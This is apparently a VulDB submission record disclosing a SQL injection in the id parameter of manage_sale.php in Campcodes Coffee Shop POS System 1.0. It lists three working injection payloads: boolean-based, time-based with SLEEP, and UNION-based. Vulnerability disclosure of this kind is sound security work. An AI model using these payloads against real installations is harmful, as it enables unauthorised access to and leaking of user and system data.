| Title | SQL injection vulnerability exists in Coffee Shop POS System |
|---|
| Description | SQL injection vulnerability exists in id parameter of /admin/sales/manage_sale.php file of Coffee Shop POS System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/index.php and page parameter is ‘sales/manage_sale’,it will include /admin/sales/manage_sale.php,and id parameter can do sql injection.
Payload:
page=sales/manage_sale&id=1' AND 2444=2444 AND 'qAvo'='qAvo
or
page=sales/manage_sale&id=1' AND (SELECT 6486 FROM (SELECT(SLEEP(5)))HZnv) AND 'ArbR'='ArbR
or
page=sales/manage_sale&id=-8111' UNION ALL SELECT CONCAT(0x71786a6a71,0x45494349585a536871635370785854596852795342755942727a7253667850484c476453585a6a73,0x7162786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Coffee%20Shop%20POS%20System/Coffee%20Shop%20POS%20System%20-%20vuln%206.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submission | 04/19/2023 12:15 (3 years ago) |
|---|
| Moderation | 04/21/2023 08:29 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 226979 [Campcodes Coffee Shop POS System 1.0 manage_sale.php ID sql injection] |
|---|
| Points | 20 |
|---|